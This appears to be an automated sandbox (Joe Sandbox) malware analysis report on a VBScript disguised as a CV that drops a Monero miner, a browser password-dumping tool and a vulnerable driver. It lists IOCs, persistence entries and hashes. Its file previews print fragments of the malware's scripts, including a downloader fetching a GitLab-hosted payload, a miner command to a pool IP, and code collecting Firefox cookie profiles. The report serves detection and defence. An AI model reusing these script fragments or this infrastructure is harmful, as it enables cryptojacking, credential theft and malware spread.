https://gitlab.com/cv6535510/cv/-/raw/main/curriculum_vitae-usb.vbs?inline=falseMsg	wscript.exe, 00000015.00000002.992417001.0000016591D38000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000003.898409186.000001FFE093A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000003.898525051.000001FFE093A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000003.898567720.000001FFE0943000.00000004.00000020.00020000.00000000.sdmp	false		high
https://gitlab.com/-/sandbox/	wscript.exe, 00000005.00000003.811836031.0000022165974000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858632166.000002216318E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp	false		high
https://gitlab.com/admin/	wscript.exe, 00000005.00000003.811836031.0000022165974000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858632166.000002216318E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp	false		high
https://gitlab.com/assets/	wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp	false		high
https://customers.gitlab.com	wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp	false		high
https://gitlab.com/-/speedscope/index.html	wscript.exe, 00000005.00000003.811836031.0000022165974000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858632166.000002216318E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/recaptcha/	wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp	false		high
https://xmrig.com/docs/algorithms	7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, mservice.exe, 00000013.00000000.863918261.00007FF7A0D92000.00000002.00000001.01000000.00000009.sdmp, mservice.exe.11.dr	false	URL Reputation: safe URL Reputation: safe	unknown
https://sourcegraph.com	wscript.exe, 00000005.00000003.811414806.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.857991730.0000022163565000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858632166.000002216318E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp	false		high
https://gitlab.com/cv4345521/cv/-/raw/main/gmail.7z?inline=falsex	wscript.exe, 00000005.00000003.811414806.0000022163163000.00000004.00000020.00020000.00000000.sdmp	false		high
https://apis.google.com	wscript.exe, 00000005.00000003.811414806.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.857991730.0000022163565000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858632166.000002216318E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp	false		high
https://snowplow.tgitlab.c%%.	wscript.exe, 00000005.00000003.811836031.0000022165974000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://www.nirsoft.net/	7g.exe, 0000000B.00000003.816824886.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.dr	false		high
https://sentry.gitlab.net	wscript.exe, 00000005.00000003.811836031.0000022165974000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858632166.000002216318E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://gitlab.com/cv4345521/cv/-/raw/main/gmail.7z?inline=falsem	wscript.exe, 00000005.00000003.811414806.0000022163163000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.recaptcha.net/	wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.65.251.78	gitlab.com	United States	13335	CLOUDFLARENETUS	false
49.12.202.237	www.7-zip.org	Germany	24940	HETZNER-ASDE	false
141.94.96.144	unknown	Germany	680	DFNVereinzurFoerderungeinesDeutschenForschungsnetzese	true

General Information

Joe Sandbox Version:	37.1.0 Beryl
Analysis ID:	882715
Start date and time:	2023-06-06 17:24:56 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 45s
Hypervisor based Inspection enabled:	false
Report type:	light
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	curriculum_vitae-copie.vbs
Detection:	MAL
Classification:	mal100.troj.evad.mine.winVBS@29/17@2/3
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 6.9% (good quality ratio 6.9%) Quality average: 84.7% Quality standard deviation: 18.3%
HCA Information:	Successful, ratio: 98% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .vbs Override analysis time to 240s for JS/VBS files not yet terminated

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WMIADAP.exe, WmiPrvSE.exe, svchost.exe
TCP Packets have been reduced to 100
Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
17:25:58	API Interceptor	44x Sleep call for process: powershell.exe modified
17:28:51	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Media Service wscript.exe "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo
17:28:52	Task Scheduler	Run new task: MicrosoftUpdateService path: wscript.exe s>C:\Users\Public\windowsupdate\mservice.vbs //b //nologo
17:29:00	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Media Service wscript.exe "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo

Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	584704
Entropy (8bit):	6.635079012262598
Encrypted:	false
SSDEEP:	12288:trKhRhfkjdw4HKcZDhysKJ1npqCC6BzHtP4iFO+:treJSwIKIysk1nxbVHtdO+
MD5:	F7D5BA4EC2A88F2FF1F0ABEC61108A0B
SHA1:	73EC819230F0C03B46A97FB3A9DEA013151874EA
SHA-256:	89FE813D8A27CCC7F261E32BF1ACD605D55523579C3C0662104C083BFE710D8B
SHA-512:	7AD2C62BB0318841A86DCDBA6F82F4EA7515245D4C9CDE08CB807748BDAE4DE43E4729CA84D8DAA164DD567717CB0AAF49B24E9B5AB6BF31B1418B8144B3B77A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y.r.............f.......r...............r.......r.........C...............A.....+..............+........g......................Rich............PE..L.....Wd.................t........................@.......................................@.................................$...x.... .......................0...L......................................................4............................text....r.......t.................. ..`.rdata...............x..............@..@.data....j..........................@....sxdata.............................@....rsrc........ ......................@..@.reloc...V...0...X..................@..B................................................................................................................................................................................................................................................

C:\Users\Public\WindowsUpdate\Update.xml

Download File

Process:	C:\Users\Public\7g.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	2794
Entropy (8bit):	3.549190186621027
Encrypted:	false
SSDEEP:	48:yei1q9tRQSRiMyVwTvara+iaiudupRCRf9ufAuRa7T5XHPsV8i59rQt+++:ttRdRi1WGdiaigV9ll7dHFSQ+
MD5:	21D6C92F3AA287A7BAE667DC3618909E
SHA1:	E09887D505C41E205ADCDFC79A3203BFA9D735B2
SHA-256:	90EA3B7C2B00D4BD10E180777FFDAEA8037DA06208906DBE923AD7207F95C59F
SHA-512:	907E24370DDE2DDECA4007FA563241280571AED2640C367645C859AA375431A88605CA18A775B3B346436C5DB9E9DD53A7D4D8E8E6EAE95DC0605B13BC721171
Malicious:	true
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...2.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.T.r.i.g.g.e.r.s.>..... . . . .<.T.i.m.e.T.r.i.g.g.e.r.>..... . . . . . .<.R.e.p.e.t.i.t.i.o.n.>..... . . . . . . . .<.I.n.t.e.r.v.a.l.>.P.T.1.0.M.<./.I.n.t.e.r.v.a.l.>..... . . . . . . . .<.S.t.o.p.A.t.D.u.r.a.t.i.o.n.E.n.d.>.f.a.l.s.e.<./.S.t.o.p.A.t.D.u.r.a.t.i.o.n.E.n.d.>..... . . . . . .<./.R.e.p.e.t.i.t.i.o.n.>..... . . . . . .<.S.t.a.r.t.B.o.u.n.d.a.r.y.>.2.0.2.3.-.0.2.-.0.5.T.1.4.:.3.1.:.0.0.<./.S.t.a.r.t.B.o.u.n.d.a.r.y.>..... . . . . . .<.E.n.a.b.l.e.d.>.t.r.u.e.<./.E.n.a.b.l.e.d.>..... . . . .<./.T.i.m.e.T.r.i.g.g.e.r.>..... . .<./.T.r.i.g.g.e.r.s.>..... . .<.S.e.t.t.i.n.g.s.>..... . . . .<.M.u.l.t.i.p.l.e.I.n.s.t.a.n.c.e.s.P.o.l.i.c.y.>.I.g.n.o.r.e.N.e.w.<./.M.u.l.t.i.p.l.e.I.n.s.t.a.n.c.e.s.P.o.l.i.c.y.>..... . . . .<.D.

C:\Users\Public\WindowsUpdate\WinRing0x64.sys

Download File

Process:	C:\Users\Public\7g.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14544
Entropy (8bit):	6.2660301556221185
Encrypted:	false
SSDEEP:	192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
MD5:	0C0195C48B6B8582FA6F6373032118DA
SHA1:	D25340AE8E92A6D29F599FEF426A2BC1B5217299
SHA-256:	11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
SHA-512:	AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
Malicious:	true
Yara Hits:	Rule: PUA_VULN_Driver_OpenLibSysorg_WinRingsys_WinRing_7Q9n, Description: Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - 0c0195c48b6b8582fa6f6373032118da.bin, 27bcbeec8a466178a6057b64bef66512.bin, Source: C:\Users\Public\WindowsUpdate\WinRing0x64.sys, Author: Florian Roth
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.\|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..\|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

C:\Users\Public\WindowsUpdate\go.exe

Download File

Process:	C:\Users\Public\7g.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category:	dropped
Size (bytes):	226816
Entropy (8bit):	7.8690577923377445
Encrypted:	false
SSDEEP:	6144:S11ynIPsj6sBu8eDJc+SkXe8UmV7Mrra8kyQWmqdJW0bx:SAIPsj6sBCdskXCmVo3kyQLeRbx
MD5:	D418273816199870DE1A16C99702A6CF
SHA1:	92549DDA7BBCAC5EB3CC17C8FF3618C444F82AD3
SHA-256:	5ACF2688DBC6E2078D19AD7580BC06C61BF4DA9C81731738659E2A4A2C045F0B
SHA-512:	34400D0114E9300AAC9C4B0F858376B19FF6F1A00465C424CF3CEF55200204641ABE2F413CE7CA047A49CB981E31EF6C532CA216CB8B28AE362DA251A3E55AFC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 16%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U...4..4..4..;...4..;...4......4.7...4..4.5.....4....4....4....4.Rich.4.................PE..L.....Jc.................P...0.......Z.......`....@.............................................................................X....`..."..........................................................................................................UPX0....................................UPX1.....P.......L..................@....rsrc....0...`...&...P..............@..............................................................................................................................................................................................................................................................................................................................................................................................3.95.UPX!....

C:\Users\Public\WindowsUpdate\mozilla.vbs

Download File

Process:	C:\Users\Public\7g.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4428
Entropy (8bit):	5.0675742940767075
Encrypted:	false
SSDEEP:	96:hGzQkmSN/YdJpJOwmX+n4dWzqG5/heHapYHZ7neI+:hImc/aLR5/heHhneI+
MD5:	940BECD4A93648C673BF2D62EA2EA381
SHA1:	3E5C32C433F2D2178053584A9607E833ADD4F8C8
SHA-256:	DE5484BEA391CF374E60A7492C7BCD9C12FA8E3185A1A0C1EBC0155701C5AFA5
SHA-512:	3B56FB492B19310F5DD33A989E979CE728D587755C78C65843C604EC23953D51BF5F532BAEE656F60374A372C37F2806888B722DDC65290A81478E3F83658842
Malicious:	true
Preview:	dim profiles(100)..cpt_profile=0....set objFso = CreateObject("Scripting.FileSystemObject")..Set oShell = CreateObject( "WScript.Shell" )..appdata=oShell.ExpandEnvironmentStrings("%appdata%") ..TraverseFolders appdata....Sub ZipFolder (sFolder,zipFile).. on error resume next.. With CreateObject("Scripting.FileSystemObject").. zipFile = .GetAbsolutePathName(zipFile).. sFolder = .GetAbsolutePathName(sFolder).... With .CreateTextFile(zipFile, True).. .Write Chr(80) & Chr(75) & Chr(5) & Chr(6) & String(18, chr(0)).. End With.. End With.... With CreateObject("Shell.Application").. .NameSpace(zipFile).CopyHere .NameSpace(sFolder).Items.. Do Until .NameSpace(zipFile).Items.Count = _.. .NameSpace(sFolder).Items.Count.. WScript.Sleep 1000 .. Loop.. End With....End Sub....Function TraverseFolders(f)..set fldr = objFso.GetFolder(f)..if objFso.fileexists(f+"\cookies.sqlite") and objFso.fileexists(

C:\Users\Public\WindowsUpdate\mservice.exe

Download File

Process:	C:\Users\Public\7g.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4770304
Entropy (8bit):	6.649403136807024
Encrypted:	false
SSDEEP:	98304:4XCVqZY5SVIhbh1A8K/drFfV6I8NXpBtkuzDS8VvazdNBi/:VVqJkI89pBTDS8NeNi/
MD5:	CFC0000B993A31C11EF58AC53837E4E1
SHA1:	750752B9C20C6BAC25C172FC5A0645CC7D631457
SHA-256:	47D70838CBEDC8B0E0634E51BDE8A72035922BDDC1177CC9210FA0ADB967D6A2
SHA-512:	BF03704F5E363940328112825976B78BE50E4A8BE2A64D50EB71E1EC016946F9D6DD256ECD2B87105AE45614982351B27AE99A53284321C3EBBC16CE316B960E
Malicious:	true
Yara Hits:	Rule: XMRIG_Monero_Miner, Description: Detects Monero mining software, Source: C:\Users\Public\WindowsUpdate\mservice.exe, Author: Florian Roth (Nextron Systems) Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: C:\Users\Public\WindowsUpdate\mservice.exe, Author: Florian Roth (Nextron Systems) Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Users\Public\WindowsUpdate\mservice.exe, Author: Florian Roth (Nextron Systems) Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\Public\WindowsUpdate\mservice.exe, Author: Joe Security Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Users\Public\WindowsUpdate\mservice.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........=...\...\...\...7...\...7...\...3{..\...)...\...)...\...)...\...7...\...)...\...7...\...\...]...)...^...)...\...)...\...)y..\...\...\...)...\..Rich.\..........................PE..d....dc..........".......4...>.......0........@............................. s......jI...`.................................................\|tE.......r......@p.<.............r.h{..@.B.......................B.(...`.B.8............ 4..............................text.....4.......4................. ..`.rdata...u... 4..v....4.............@..@.data...4.*...E.......E.............@....pdata..<....@p......"F.............@..@_RANDOMXV.... r.......G.............@..`_TEXT_CN.&...0r..(....H.............@..`_TEXT_CN.....`r......4H.............@..`_RDATA........r......FH.............@..@.rsrc.........r......HH.............@..@.reloc..h{....r..\|...NH.............@..B................................

C:\Users\Public\WindowsUpdate\mservice.vbs

Download File

Process:	C:\Users\Public\7g.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1568
Entropy (8bit):	5.533375448529494
Encrypted:	false
SSDEEP:	24:bCqIXN2pAMTEgPFtM41PKk+EfYg+1TK/AFhHqITUzF+Z+5H0TOWq/AnhskYn9DWo:HQgPFtMLkfQVNE2KIqF+I5HwkgzYb
MD5:	5CF1145271785A3EA252129F0728ED7B
SHA1:	12FA9C83FD793E51A25723BE91E66EAC7199EE6B
SHA-256:	C20D2A220F7429FA128671A5E2187B5C52821BEFDD48379E44788820FAB89E96
SHA-512:	B27F7489E7330D9910BE5A2E401C9B0B7A8371CCBD2EED857F04C2F5845AAA9CA65238452AD59680750DD5A7FA7C3BF37125CED2579431C63DED9344744FD7DD
Malicious:	true
Yara Hits:	Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: C:\Users\Public\WindowsUpdate\mservice.vbs, Author: Florian Roth (Nextron Systems)
Preview:	Function LPad (str, pad, length).. LPad = String(length - Len(str), pad) & str..End Function....set L5ofL5 = CreateObject("Scripting.FileSystemObject")..if not L5ofL5.FileExists("c:\users\public\log.dat") then ..set f = L5ofL5.CreateTextFile("c:\users\public\log.dat",True)..f.Write LPad(day(now), "0", 2)+LPad(month(now), "0", 2)+"-"+LPad(hour(now), "0", 2)+"h"+LPad(minute(now), "0", 2)+"m"..f.close..end if..set f2 = L5ofL5.OpenTextFile("c:\users\public\log.dat")..d = f2.ReadLine..f2.Close....Dim objWMIService, objComputer, colComputer ..Set objWMIService = GetObject("winmgmts:"& "{impersonationLevel=impersonate}!\\.\root\cimv2") ..Set colComputer = objWMIService.ExecQuery("Select * from Win32_ComputerSystem") ..For Each objComputer in colComputer ..ram = objComputer.TotalPhysicalMemory/(1024*1024)..Next ..if ram > 4096 then ..mode="auto"..Else..mode="light"..end if....command0 = """%public%\windowsupdate\mservice.exe"" -o 141.94.96.144:443 -u 42i5pNZm7cvXC77nHzvzhReAfaVbJX4GVXYvea8h

C:\Users\Public\WindowsUpdate\ps.exe

Download File

Process:	C:\Users\Public\7g.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	402944
Entropy (8bit):	6.666814366272581
Encrypted:	false
SSDEEP:	6144:QNV8uoDRSdm3v93UFlssFHgkU9KvKUXr/BAO9N/oXrsAteTQokizYu:eSDRSm3vrugB9KvKk9RO8k3u
MD5:	2024EA60DA870A221DB260482117258B
SHA1:	716554DC580A82CC17A1035ADD302C0766590964
SHA-256:	53043BD27F47DBBE3E5AC691D8A586AB56A33F734356BE9B8E49C7E975241A56
SHA-512:	FFCD4436B80169BA18DB5B7C818C5DA71661798963C0A5F5FBAC99A6974A7729D38871E52BC36C766824DD54F2C8FA5711415EC45799DB65C11293D8B829693B
Malicious:	true
Yara Hits:	Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\Public\WindowsUpdate\ps.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 81%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................9.......9............... ......................;.......;.......;......Rich............PE..L....hy`.....................P......,i............@..................................................................................@..................................................................................p............................text............................... ..`.rdata..............................@..@.data..............................@....rsrc........@......................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\Public\WindowsUpdate\sarmat.vbs

Download File

Process:	C:\Users\Public\7g.exe
File Type:	assembler source, ASCII text
Category:	dropped
Size (bytes):	2559
Entropy (8bit):	5.054358680199897
Encrypted:	false
SSDEEP:	48:PbR2Hk8fSRgDmgTzlREzXacPeIpLVdxpDnBmKhRhFI/nwvvZiOrA7BehBqnHOW+x:PbR2HtfUoxflREzXacGYzxBWCRpXMunx
MD5:	08AD7921EC11078118F3AEB89E177C3F
SHA1:	633197EE0570BA80CFE2358BBC483B64D84E838B
SHA-256:	E66DA8042513B237CE1BE98A5291C61ADE2A8EBDB87B6AEB4EB9E200B38AFC53
SHA-512:	009FE96D10FBCD751C41B7738D7E7C2748DF0F0F4C6A206C973E19D93116DE5D4906568236EC904B74302D12467126B383F3980E3351DCCD6F0232B211ABD061
Malicious:	false
Preview:	.sub L5dwlL5(L5uL5, L5sL5).dim L5xL5: Set L5xL5 = createobject("Microsoft.XMLHTTP").dim L5bL5: Set L5bL5 = createobject("Adodb.Stream").L5xL5.Open "GET", L5uL5, False.L5xL5.Send..with L5bL5. .type = 1 '//binary. .open. .write L5xL5.responseBody. .savetofile L5sL5, 2 '//overwrite.end with.end sub..url = "https://gitlab.com/cv6535510/cv/-/raw/main/curriculum_vitae-usb.vbs?inline=false"...on error resume next..sub listDrives.dim drives(100).dim labels(100).i=0.Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")..Set colDisks = objWMIService.ExecQuery ("Select * from Win32_LogicalDisk where DriveType=2 or DriveType=4").For Each objDisk in colDisks. letter = objDisk.DeviceID..if fso.GetDrive(letter).isReady then...drives(i)=letter. labels(i)=fso.GetDrive(letter).volumename...i=i+1..end if.Next.Set colShares = objWMIService.ExecQuery("Select * from Win32_Share where not name like '%$%'")..For each objShare in colShares.sharedfolder

C:\Users\Public\gmail.7z

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	7-zip archive data, version 0.4
Category:	dropped
Size (bytes):	1960608
Entropy (8bit):	7.999903958520937
Encrypted:	true
SSDEEP:	49152:cUXIV4OGLOd2YHtcmQL/IEP2g3Pg/1oVkZkS:cUXI9H+7VVrkeS
MD5:	D674B5A2A7159B838ADE554C35E15E1D
SHA1:	EDE9027E85C6FE270FA99F6C8597DDC24193C470
SHA-256:	7F5ED3342BCD240C07500B3147C8CAEA27264A936250A29AE4C85BAAE47C4906
SHA-512:	57FB778CC5A0252DC5AA486A424305AAC36E2B20F6BBC2F49C14244B23492DE290C981A56A31D08FD56956657531F767161C527F7255EA1EE5C21EAD9E68E36C
Malicious:	true
Preview:	7z..'...3ss.@.......@.........../..\#.\|.o.<.j...M..K.y..&..x.x......\|V.....6D...m@W[.......~n.....S..Ht!.m\|c...3.q.c........^..Q....wg6..;q.vo.h.W../ .T.(.v...).G....N....^.P.q...EP.Z'`72f..J...$....w.......=.,...I.>6l..$_.......4.U.dO.p.83=...d.M..B9..%r.l.g8.m.-..r....i....9....q...D...vn..p.,.4L.I.U.......\|..l._.W.\58.C......8K-..... .........5.@...r5b....L.....Fxv\|..M..^....R.K..P.>.=$U..t...5...@..\|.......a.\|8..i!._....'..E._,.#...B..]....S....zO...p......\|]......i.S/..dphV.....~.j.7.....S...iL..:L.r2...M;.\.s....nT.4.....K<.0.H!M.FR..z.E&@..b..m....J.....n.....R.cy%.I...W32sew...T.t.R..f..Z.....+.Z..N\|!....in%.S.yZ.''..{6.w.....`jt..lD^t.......\.?.......{.Q$...N.....8......Q`^..J8.3$Y...[....)Gaz....6e..._.&Ey.hx%...N%.....NM.3R=d)....wL.8...'pU..Z.....R...(.3../.FQ...T..........Hy.e .v'....K.:.....&....JBb]>..........3...v.1.~!.............$...@...R.IkU4P......tLT.\'1.......9(]....qF-........kg..L.m..X.k.7./.UW.eII..BS+....x.

C:\Users\Public\log.dat

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	11
Entropy (8bit):	3.0957952550009344
Encrypted:	false
SSDEEP:	3:poK:mK
MD5:	7AD2ED382E18A8C2C722AE2B2232092F
SHA1:	498E7363A2A45692896E78E6D9941D97FD231CC9
SHA-256:	F67BA401939C88F48CD02870DB455FA6251EC8644A4739C400A2E4432F98F914
SHA-512:	EB148181D4050F0964C8B1335E4A9835BB455C64B409FA14567825B3417BC48425577DBED44FC043B9E2CED111B9D76604B7B1883A16D11835CEE690EA63EB45
Malicious:	false
Preview:	0606-17h28m

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\7zr[1].exe

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	584704
Entropy (8bit):	6.635079012262598
Encrypted:	false
SSDEEP:	12288:trKhRhfkjdw4HKcZDhysKJ1npqCC6BzHtP4iFO+:treJSwIKIysk1nxbVHtdO+
MD5:	F7D5BA4EC2A88F2FF1F0ABEC61108A0B
SHA1:	73EC819230F0C03B46A97FB3A9DEA013151874EA
SHA-256:	89FE813D8A27CCC7F261E32BF1ACD605D55523579C3C0662104C083BFE710D8B
SHA-512:	7AD2C62BB0318841A86DCDBA6F82F4EA7515245D4C9CDE08CB807748BDAE4DE43E4729CA84D8DAA164DD567717CB0AAF49B24E9B5AB6BF31B1418B8144B3B77A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y.r.............f.......r...............r.......r.........C...............A.....+..............+........g......................Rich............PE..L.....Wd.................t........................@.......................................@.................................$...x.... .......................0...L......................................................4............................text....r.......t.................. ..`.rdata...............x..............@..@.data....j..........................@....sxdata.............................@....rsrc........ ......................@..@.reloc...V...0...X..................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\gmail[1].7z

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	7-zip archive data, version 0.4
Category:	dropped
Size (bytes):	1960608
Entropy (8bit):	7.999903958520937
Encrypted:	true
SSDEEP:	49152:cUXIV4OGLOd2YHtcmQL/IEP2g3Pg/1oVkZkS:cUXI9H+7VVrkeS
MD5:	D674B5A2A7159B838ADE554C35E15E1D
SHA1:	EDE9027E85C6FE270FA99F6C8597DDC24193C470
SHA-256:	7F5ED3342BCD240C07500B3147C8CAEA27264A936250A29AE4C85BAAE47C4906
SHA-512:	57FB778CC5A0252DC5AA486A424305AAC36E2B20F6BBC2F49C14244B23492DE290C981A56A31D08FD56956657531F767161C527F7255EA1EE5C21EAD9E68E36C
Malicious:	false
